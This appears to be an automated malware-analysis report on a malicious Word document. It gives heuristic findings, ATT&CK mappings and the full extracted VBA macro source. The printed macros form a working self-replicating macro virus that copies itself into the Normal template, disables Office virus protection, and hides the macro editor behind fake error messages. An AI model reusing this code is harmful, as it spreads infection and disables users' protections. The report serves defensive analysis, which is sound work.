Verdict: MALICIOUS
Risk Score: 256
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1566.001 Spearphishing Attachment
The sample exhibits critical heuristic firings indicating VBA macro-virus replication and AV tampering. The AutoOpen macro attempts to copy itself and another macro ('ac') into the Normal template, and the AutoClose macro likewise attempts to copy macros and save the document. The script also attempts to disable virus protection and writes to the file path 'c:\doc.win', suggesting dropper or downloader functionality. The ClamAV detection further supports the malicious verdict.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-7369994-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-7369994-0
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical) [OLE_VBA_MACRO_VIRUS_REPLICATION]: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: Application.OrganizerCopy sr, ActiveDocument, Name:="ac", Object:=wdOrganizerObjectProjectItems
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]: AutoOpen macro
  Matched line in script: Sub Autoopen()
- Auto_Close macro (low) [OLE_VBA_AUTOCLOSE]: Auto_Close macro
  Matched line in script: Sub AutoClose()
- Legacy WordBasic macro-virus markers (high) [OLE_LEGACY_WORDBASIC_MACRO_VIRUS]: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2086 bytes |

SHA-256: 90df29a0471108a34b80fa5f2a16315260b4818cd98aca372c11c757625f93ca
Detection (ClamAV): Win.Trojan.C-286
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ac"
Sub AutoClose()
On Error GoTo ab
Call cf
sr = "c:\doc.win"
imacrocount = WordBasic.countmacros(1, 0, 0)
For i = 1 To imacrocount
zu$ = WordBasic.macroname$(i, 1)
If zu$ = "ao" Then GoTo ab
Next i
Application.OrganizerCopy sr, ActiveDocument, Name:="ac", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy sr, ActiveDocument, Name:="ao", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
ab:
End Sub
Sub ToolsMacro()
MsgBox "Извините, но на пиратской версии эта функция не работает", vbCritical, "Ошибка"
End Sub
Sub ViewVBCode()
MsgBox "Ошибка в системном реестре Windows!", vbCritical, "Error"
End Sub
Sub toolsOptions()
MsgBox "Ваш компьютер теперь обладает удивительным свойством" + Chr$(13) + "-в нём есть ЖИЗНЬ!"
End Sub
' Here it is, my firstborn!
' Its name is 1313. Please remember it!!!
Attribute VB_Name = "ao"
Sub Autoopen()
Attribute Autoopen.VB_Description = "Fuck"
Attribute Autoopen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.one"
On Error GoTo aT
im = WordBasic.countmacros(0, 0)
For i = 1 To im
If WordBasic.macroname$(i, 0, 0) = "ao" Then
bI = -1
End If
Next i
If Not bI Then
sE$ = WordBasic.FileName$()
mR$ = sE$ + ":ao"
WordBasic.MacroCopy mR$, "Normal:ao", 1
mR$ = sE$ + ":ac"
WordBasic.MacroCopy mR$, "Normal:ac", 1
End If
Call cf
aT:
With Options
.VirusProtection = False
.SaveNormalPrompt = False
End With
End Sub
Sub cf()
On Error GoTo z
MF = Dir("c:\doc.win")
If MF = "doc.win" Then GoTo z
a = ActiveDocument.FullName
ActiveDocument.SaveAs "c:\doc.win"
ActiveDocument.SaveAs a
z:
End Sub